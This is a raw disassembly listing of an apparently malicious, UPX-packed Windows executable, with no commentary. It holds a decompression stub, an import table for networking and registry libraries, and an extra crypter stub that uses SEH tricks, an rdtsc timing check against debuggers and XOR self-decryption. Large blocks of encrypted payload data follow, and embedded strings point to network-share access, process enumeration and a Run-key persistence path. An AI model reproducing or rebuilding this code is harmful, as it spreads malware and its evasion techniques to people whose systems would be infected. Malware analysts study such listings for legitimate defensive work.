dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah, 0DB9BAB9Eh
dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h
dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh
dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh, 0BB6F6EDBh
dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h
dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h
dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h, 31204D41h
dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh, 0B75BB696h
dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h
dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h
dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h
dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h
dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h, 5EDEC874h
dd 901306Ch, 3500398Ch, 0DCC06C23h, 72E1D96h, 32ABDA00h
dd 889CF20h, 3B57DA20h, 9F4C9383h, 46F20003h, 0C1901E23h
dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h, 48E088h
dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh
dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h
dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h
dd 496D899Bh, 0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h
dd 6DFF20F6h, 0FF1640h, 0E00DEDEh, 19F1600h, 9BF2602h
dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h
dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh, 5D6DCF54h
dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h
dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh, 0B10C3919h
dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h
dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h
dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h
dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh
dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h
dd 2FE409CFh, 230EFEFFh
dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h, 0B801FFEEh
dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h, 700118D8h
dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh
dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h
dd 0C0A6DB20h, 7250CAh, 39014446h, 3C844FC9h, 123C6B32h
dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h
dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h, 0E4FF071Ch
dd 44655300h, 67756265h, 0FA377669h, 67853518h, 6A6441A7h
dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h, 0BF6D7075h
dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h
dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh
dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h
dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h, 284158DBh
dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h, 48F46897h
dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h, 9F4B010Ah
dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah
dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h, 8EA9EE2Fh
dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh
dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh
dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h
dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h
dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h, 909A3233h
dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h
dd 4D5C4552h, 62C1F869h, 6F736F7Bh, 5CBF5CD7h, 72727543h
dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h
dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h, 7264736Eh
dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h
dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h
dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh
dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h
dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h, 6D1B1358h
dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h
dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh
dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch
dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h, 978A5F87h
dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh, 0A956372h
dd 79706F43h, 70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h
dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h
dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h
dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh
dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h, 0D9B9E144h
dd 8D225AC3h, 3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h
dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h
dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh
dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h
dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh
dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh
dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h
dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h
dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh
dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh
dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h
dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h
dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h
dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h
dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h
dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h
dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 0CA7273ECh
dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh
dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h
dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h
dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h
dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h
dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h
dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh
dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh
dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h
dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h
dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh
dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h
dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h
dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0)
db 90h
db 0FFh, 2 dup(0)
align 10h
pusha
mov esi, offset dword_31426000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31427BD2
; ---------------------------------------------------------------------------
align 8
loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31427BCE: ; CODE XREF: UPX1:31427C66�j
; UPX1:31427C7D�j
add ebx, ebx
jnz short loc_31427BD9
loc_31427BD2: ; CODE XREF: UPX1:31427BC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BD9: ; CODE XREF: UPX1:31427BD0�j
jb short loc_31427BC8
mov eax, 1
loc_31427BE0: ; CODE XREF: UPX1:31427BEF�j
; UPX1:31427BFA�j
add ebx, ebx
jnz short loc_31427BEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BEB: ; CODE XREF: UPX1:31427BE2�j
adc eax, eax
add ebx, ebx
jnb short loc_31427BE0
jnz short loc_31427BFC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427BE0
loc_31427BFC: ; CODE XREF: UPX1:31427BF1�j
xor ecx, ecx
sub eax, 3
jb short loc_31427C10
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31427C82
mov ebp, eax
loc_31427C10: ; CODE XREF: UPX1:31427C01�j
add ebx, ebx
jnz short loc_31427C1B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C1B: ; CODE XREF: UPX1:31427C12�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31427C28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C28: ; CODE XREF: UPX1:31427C1F�j
adc ecx, ecx
jnz short loc_31427C4C
inc ecx
loc_31427C2D: ; CODE XREF: UPX1:31427C3C�j
; UPX1:31427C47�j
add ebx, ebx
jnz short loc_31427C38
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C38: ; CODE XREF: UPX1:31427C2F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31427C2D
jnz short loc_31427C49
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427C2D
loc_31427C49: ; CODE XREF: UPX1:31427C3E�j
add ecx, 2
loc_31427C4C: ; CODE XREF: UPX1:31427C2A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31427C6C
loc_31427C5D: ; CODE XREF: UPX1:31427C64�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31427C5D
jmp loc_31427BCE
; ---------------------------------------------------------------------------
align 4
loc_31427C6C: ; CODE XREF: UPX1:31427C5B�j
; UPX1:31427C79�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31427C6C
add edi, ecx
jmp loc_31427BCE
; ---------------------------------------------------------------------------
loc_31427C82: ; CODE XREF: UPX1:31427C0C�j
pop esi
mov edi, esi
mov ecx, 7Eh
loc_31427C8A: ; CODE XREF: UPX1:31427C91�j
; UPX1:31427C96�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31427C8F: ; CODE XREF: UPX1:31427CB4�j
cmp al, 1
ja short loc_31427C8A
cmp byte ptr [edi], 1
jnz short loc_31427C8A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31427C8F
lea edi, [esi+5000h]
loc_31427CBC: ; CODE XREF: UPX1:31427CDE�j
mov eax, [edi]
or eax, eax
jz short loc_31427D07
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31427CD9: ; CODE XREF: UPX1:31427CFF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31427CBC
mov ecx, edi
jns short near ptr loc_31427CEA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31427CEA: ; CODE XREF: UPX1:31427CE2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31427D01
mov [ebx], eax
add ebx, 4
jmp short loc_31427CD9
; ---------------------------------------------------------------------------
loc_31427D01: ; CODE XREF: UPX1:31427CF8�j
call dword ptr [esi+7094h]
loc_31427D07: ; CODE XREF: UPX1:31427CC0�j
popa
jmp loc_31422334
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00012000 ( 73728.)
; Section size in file : 00012000 ( 73728.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dword_3142808C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; UPX2:31432039�r
dd 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 1C39068h, 0FFC48BEDh, 0E85B93D0h, 59h, 824648Bh, 4EBB8h
dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 3C7500F8h
dd 0E8h, 0ED815D00h, 402334h, 237B858Bh, 85030040h, 402383h
dd 858BF08Bh, 40237Fh, 23838503h, 8B500040h, 0ACC933FEh
dd 238B8532h, 41AA0040h, 23878D3Bh, 0EF7C0040h, 64C02BC3h
dd 896430FFh, 5678B820h, 3871234h, 6000h, 7BB0h, 31420000h
dd 1E00h, 78h, 75Dh dup(0)
; ---------------------------------------------------------------------------
pusha
call loc_3142A010
call sub_3142A099
jmp near ptr byte_3142A041
; ---------------------------------------------------------------------------
loc_3142A010: ; CODE XREF: UPX2:3142A001�p
push dword ptr fs:0
mov fs:0, esp
add ds:dword_3142A042, esp
xor ebx, ebx
push ebx
push ebx
push ebx
push 80000000h
push ebx
push ebx
push ebx
push 80000000h
push ebx
push 80000000h
push ebx
call ds:dword_3142808C ; LoadLibraryA
; ---------------------------------------------------------------------------
byte_3142A041 db 0BCh ; CODE XREF: UPX2:3142A00B�j
dword_3142A042 dd 12FF9Ch ; ---------------------------------------------------------------------------
sub eax, eax
loc_3142A048: ; CODE XREF: UPX2:3142A04E�j
dec al
or al, al
jz short loc_3142A052
jnz short loc_3142A048
jmp short near ptr loc_3142A0B5+4
; ---------------------------------------------------------------------------
loc_3142A052: ; CODE XREF: UPX2:3142A04C�j
call sub_3142A096
add ecx, 4Fh
sub ebp, ebp
xor ebp, 28B0h
mov ebx, 5Fh
cld
cld
cld
cld
cld
cld
push ecx
loc_3142A071: ; CODE XREF: UPX2:3142A084�j
mov al, [ecx]
sub ax, bx
mov [ecx], al
stc
inc ecx
add bx, 1Fh
sub ebp, 1
or ebp, ebp
jnz short loc_3142A071
pop ecx
pop large dword ptr fs:0
pop ebx
mov [esp+18h], ecx
popa
jmp ecx
; =============== S U B R O U T I N E =======================================
sub_3142A096 proc near ; CODE XREF: UPX2:loc_3142A052�p
pop ecx
push ecx
retn
sub_3142A096 endp
; =============== S U B R O U T I N E =======================================
sub_3142A099 proc near ; CODE XREF: UPX2:3142A006�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_3142A099 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
cld
mov [eax+2FE3h], ebx
loc_3142A0B5: ; CODE XREF: UPX2:3142A050�j
test dword ptr [eax+28A0h], 80000000h
mov ebx, [esp+4]
jz short loc_3142A0F1
pop ecx
mov [eax+2FE7h], esi
mov [eax+2FEBh], edi
cmp byte ptr [eax+28A4h], 0E8h
jnz short loc_3142A0E8
add ebx, [eax+28A5h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_3142A0F0
; ---------------------------------------------------------------------------
loc_3142A0E8: ; CODE XREF: UPX2:3142A0D9�j
mov ebx, [eax+28A6h]
push dword ptr [ebx]
loc_3142A0F0: ; CODE XREF: UPX2:3142A0E6�j
pop ebx
loc_3142A0F1: ; CODE XREF: UPX2:3142A0C3�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1EABh
sub ebp, 361005h
mov edi, [esp+4]
lea esi, [ebp+3638B0h]
mov ecx, 0
rep movsb
call sub_3142A166
mov ecx, eax
call sub_3142A166
sub eax, ecx
jz short loc_3142A13A
cmp eax, 100h
ja short loc_3142A13A
lea eax, [ebp+3610D3h]
mov dl, [eax-10h]
call sub_3142A16A
jmp short loc_3142A179
; ---------------------------------------------------------------------------
loc_3142A13A: ; CODE XREF: UPX2:3142A121�j
; UPX2:3142A128�j
test dword ptr [ebp+3638A5h], 80000000h
jz short loc_3142A164
lea esi, [ebp+3638A9h]
mov edi, [esp+4]
movsb
movsd
mov esi, [ebp+363FECh]
mov edi, [ebp+363FF0h]
mov ebx, [ebp+363FE8h]
loc_3142A164: ; CODE XREF: UPX2:3142A144�j
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_3142A166 proc near ; CODE XREF: UPX2:3142A113�p
; UPX2:3142A11A�p
rdtsc
retn
sub_3142A166 endp
; ---------------------------------------------------------------------------
db 0A0h
; =============== S U B R O U T I N E =======================================
sub_3142A16A proc near ; CODE XREF: UPX2:3142A133�p
mov dh, dl
mov ecx, 27D2h
loc_3142A171: ; CODE XREF: sub_3142A16A+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_3142A171
retn
sub_3142A16A endp
; ---------------------------------------------------------------------------
loc_3142A179: ; CODE XREF: UPX2:3142A138�j
and [ebx+3FDF70E0h], esp
loope loc_3142A1FC
out dx, al
adc al, 88h
jmp near ptr 0B2AB55DCh
; ---------------------------------------------------------------------------
db 4Bh, 40h, 0E1h
dd 8FB52080h, 0A343638Bh, 584146BCh, 0C35E550h, 63B8700Bh
dd 0C0322BD3h, 63D86A0Bh, 0E3EDF1F3h, 18414643h, 9510D402h
dd 65B8A189h, 8401C36Fh, 8A2225F4h, 0C983FD59h, 124B048Ch
dd 1343F924h, 2EC4978Fh, 0E35CDA8Bh, 0E7F4AB7Bh, 0ECA85303h
dd 23C02080h, 8533CF6Ch, 4AE41C8h, 0B340C56Ch, 0E549F67Fh
dd 0E0769B46h, 60C02D68h, 8532E300h
; ---------------------------------------------------------------------------
loc_3142A1FC: ; CODE XREF: UPX2:3142A17F�j
loope loc_3142A252
movsd
and eax, 942EC576h
shl dword ptr [eax], 93h
lahf
setalc
sub ebp, eax
stosb
mov ebx, 0D88C016h
mov al, ds:45C7E040h
mov ah, 2Ch
popa
sal dword ptr ds:12AF52F2h, cl
add bl, dh
mov edi, 8EA50936h
pop ebx
mov al, ss:208323A8h ; CODE XREF: UPX2:loc_3142A252�j
shl ch, 0C0h
scasd
; ---------------------------------------------------------------------------
dw 0E3C4h
dd 303FDF7Fh, 0DB0E35FFh, 0A04520B6h, 0E3C1250Fh, 0DD402080h
dd 0E076B52Ch, 9FD45581h
; ---------------------------------------------------------------------------
mov ch, 48h
loc_3142A252: ; CODE XREF: UPX2:loc_3142A1FC�j
jg short near ptr loc_3142A228+2
sbb dh, 4Dh
dec esp
adc eax, 56F4096h
movsb
aad 56h
add [ebx+47h], cl ; CODE XREF: UPX2:3142A289�j
arpl ds:56D5A4h, sp
mov al, ds:35F445C3h
mul byte ptr [eax+0]
and esp, ebp
cwde
xchg eax, ebp
push ss
shl byte ptr [eax-7Dh], 5
cmp al, 0F5h
mov dh, 20h
sal byte ptr [edi], 0C6h
and eax, 20B6F291h
shr ecx, 0B5h
repne jnp short near ptr loc_3142A260+2
sub byte ptr [ebp-69EA6F8Bh], 40h
ror dword ptr [ecx-53h], cl
jge short locret_3142A2D6
cmp edx, [esi-375FAEC0h]
dec esp
arpl [eax], ax
mov al, ds:0BE151F1Fh ; CODE XREF: UPX2:3142A2C2�j
sti
push esi
add [ecx-58h], ah
dec dword ptr [edi+6014A4h]
mov al, ds:4A94A7CBh
and byte ptr [ebx-3Dh], 0C8h
inc eax
lock sub byte ptr [eax], 49h
in eax, 56h
wait
jbe short near ptr loc_3142A2A1+3
call near ptr 31A352F2h
retf 1F40h
; ---------------------------------------------------------------------------
adc eax, 56FBF6h
and eax, 0CE04EF80h
locret_3142A2D6: ; CODE XREF: UPX2:3142A296�j
retn 60h
; ---------------------------------------------------------------------------
db 37h, 0CDh, 55h
dd 60F63080h, 0E3F94F8Bh, 0E1C0208Ch, 0D650A0EDh, 3155AD80h
dd 13409612h, 0E322DF25h, 1CCB80ECh, 0A0F328EAh, 0D9D52D59h
dd 93C0169Bh, 69BC2BABh, 273E30D7h, 0E328F71Ch, 9FC02180h
dd 0D67BF695h, 4004A380h, 644F6085h, 60C0221Fh, 8A40CA97h
dd 64C04881h, 0E0282000h, 9FC02180h, 0D67BF695h, 6F00A580h
dd 0E0422284h, 30C04A80h, 0E440A068h, 0A1C04A80h, 8A17ACE8h
dd 61A87081h, 1F40A100h, 56FB7615h, 0E04AC800h, 0F53F2081h
dd 0E0769B56h, 60C02568h, 0E2114900h, 60AA2080h, 8A4A4359h
dd 0AA55DF8Ah, 0B40963Bh, 0DD43E371h, 0E0769B76h, 54442F80h
dd 840A002h, 60C02086h, 0AC04F44Eh, 0F53F20CCh, 0E0769B92h
dd 770A950Dh, 2973A036h, 5B1E9D0Dh, 0EEF1A036h, 62B4C813h
dd 5DC3A000h, 60F61C92h, 0E0C4AF00h, 0EBC02082h, 0D67B4285h
dd 61B0DF80h, 0D7BC258Fh, 0E54B20B6h, 0E0769BFAh, 0EFC1507Fh
dd 0D678E985h, 8645AB80h, 1F40963Bh, 0E54F21F0h, 0E0769850h
dd 5B2AAD0Bh, 0FAA3A036h, 0EFC1517Fh, 0D678FD85h, 924DAB80h
dd 340963Bh, 61B1DF89h, 0D82A258Fh, 0D82820B6h, 6D40A001h
dd 56FC483Dh, 8A8F2B00h, 9F19D680h, 1C3A470h, 63804A83h
dd 0E02AF7F9h, 0D54D38EAh, 0E076B5D7h, 60C03939h, 0AD442D00h
dd 9F3FDF7Eh, 0E4CD0B66h, 60C020CDh, 6DEBC600h, 526B24C7h
dd 0F4D52DE4h, 0CCC016BBh, 86422966h, 6202A32Bh, 34CB55E2h
dd 69A820EAh, 6B40A070h, 0EBC04A4Ch, 8840CAC4h, 68C02080h
dd 0B211E06Ah, 9F902EEAh, 0D67B4E95h, 0A4437880h, 9049C840h
dd 0B44B2080h, 2CCBA06Ah, 60AA60EAh, 8A12A26Ah, 10C94880h
dd 0E02AA000h, 303F4AD1h, 0DBB635FFh, 399F20B6h, 644F5F85h
dd 60C02187h, 0F040158Dh, 637920B6h, 6B40A00Ch, 0E165D36Fh
dd 0D650A0EDh, 5745AD80h, 1F409614h, 0A947060h, 1FBFCA20h
dd 56FBDE15h, 0BF802500h, 2E2814F5h, 840A001h, 60C02091h
dd 8504C553h, 30A755E2h, 8936C972h, 5A745ECh, 0AFA8F700h
dd 9FC02085h, 0D67FCCB5h, 0E255DF80h, 0B740963Bh, 5B86B57Fh
dd 0E02AA036h, 0F53F22EAh, 0E0769B76h, 60C10839h, 16B3700h
dd 34E42C09h, 5AD55F57h, 53C016BBh, 0B6E523F6h, 60C016BCh
dd 75BFF754h, 60F61B3Eh, 86346085h, 643EA3C6h, 94BF4E72h
dd 60AA28A4h, 75BF8A6Ah, 60F61B36h, 3C346085h, 6547C813h
dd 2973A000h, 59FAC311h, 0D67CF685h, 0E1F25580h, 8364847Ch
dd 14B352F3h, 7D812128h, 30C0208Eh, 0B116F054h, 9F9370D0h
dd 0D67BCE95h, 3900A580h, 94BFAF74h, 0E54F28A4h, 0E0769C56h
dd 9F3DE568h, 75BFF3FFh, 60F61BC6h, 24C12EEBh, 60C021A8h
dd 0A6D55F57h, 9FC016BBh, 0D67BE695h, 9BA8C980h, 0BA405FFFh
dd 60AA20EAh, 0E02AA06Ah, 64C021E8h, 8A842B00h, 6CAA7080h
dd 2BF648Bh, 549F58D6h, 2973A000h, 9F3FFA68h, 0A6D52DFFh
dd 32C01695h, 1F10F151h, 56FB6A15h, 0C0842300h, 3898B043h
dd 0D049A058h, 6EA82080h, 0E041A000h, 60C02080h, 0E040A000h
dd 48652080h, 0E040A000h, 36912080h, 0B2D55F53h, 0CBC016BBh
dd 20C40C59h, 8E22DBF5h, 91D52DC3h, 32C01699h, 0DBEA35FFh
dd 0E54920B6h, 0E0769F6Ch, 60C03668h, 8F2FEC00h, 30B055EBh
dd 8936C972h, 5A745ECh, 952CC156h, 30C061E5h, 0DB1235FFh
dd 0E54920B6h, 0E0769F70h, 1827C43h, 810EC573h, 2FA445EDh
dd 8325CA62h, 369C53F4h, 8325F374h, 13AC20F4h, 852CD274h
dd 128320EEh, 8534C165h, 5AC49C6h, 9203A041h, 5B441E5h
dd 852CC946h, 10B041CDh, 0A127CE69h, 5B26380h, 0B025D461h
dd 5A34FF2h, 0E001D373h, 1A552C3h, 8512C574h, 5B44FEDh
dd 8532C854h, 23C044E1h, 9421C572h, 12A874E5h, 0E024C165h
dd 1A552C3h, 8F14C574h, 5A84CEFh, 0D273D06Ch, 10A14ED3h
dd 942FC873h, 9B86580h, 9228F474h, 60A441E5h, 852CC946h
dd 5AD49D4h, 9913CF54h, 0DA554F3h, 852DC954h, 5B26680h
dd 8229EC65h, 19B241F2h, 9425E700h, 5AC49C6h, 9234D441h
dd 14B542E9h, 0E001D365h, 26B445C7h, 0B325CC69h, 60A55AE9h
dd 0A634C547h, 34A54CE9h, 0E025CD69h, 2DB445C7h, 8C35C46Fh
dd 0EA168E5h, 0A125CC64h, 14A56780h, 902DC554h, 5AC49C6h
dd 852DC14Eh, 58720C1h, 8D25F474h, 14A170F0h, 0A740E168h
dd 59654E5h, 8F29D372h, 58720EEh, 9225F674h, 0EAF49F3h
dd 0E001D845h, 36B445C7h, 8D35CC6Fh, 6AE69E5h, 812DD26Fh
dd 0EAF49F4h, 8F0CA041h, 98C44E1h, 9221D262h, 2DC061F9h
dd 8916D061h, 68F57E5h, 852CC946h, 5B06F80h, 8C29E66Eh
dd 10A16DE5h, 872EC970h, 108F20C1h, 9210CE65h, 13A543EFh
dd 9210A073h, 13A543EFh, 0A6729373h, 14B352E9h, 8F32F000h
dd 13B345E3h, 850E9233h, 33C054F8h, 8906D465h, 148145ECh
dd 8229D274h, 13A554F5h, 8513A041h, 0CA966F4h, 8D29F465h
dd 0C9320E5h, 0E030C565h, 14B359D3h, 8914CD65h, 0F9445EDh
dd 852CC946h, 5AD49D4h, 8D2EF500h, 99650E1h, 860FD765h
dd 5AC49C6h, 9229F600h, 0CA155F4h, 8F2CCC41h, 129720E3h
dd 0A625D469h, 60A54CE9h, 8401D44Eh, 14B355EAh, 9629D250h
dd 7A54CE9h, 8F14D365h, 60AE45EBh, 9203D44Eh, 5B441E5h
dd 852CC946h, 23B46E80h, 9421C572h, 0FB270E5h, 9333C563h
dd 23B46E80h, 9421C572h, 0FB270E5h, 9333C563h, 2EC058C5h
dd 8532E374h, 33A554E1h, 8934C365h, 2EC04EEFh, 8532E374h
dd 35A554E1h, 0B032C573h, 5A34FF2h, 0AE40D373h, 10A16DF4h
dd 9725C956h, 59346CFh, 8F29D463h, 148E20EEh, 8E25D04Fh
dd 5AC49C6h, 0AF34EE00h, 30AE45F0h, 8523CF72h, 0F9453F3h
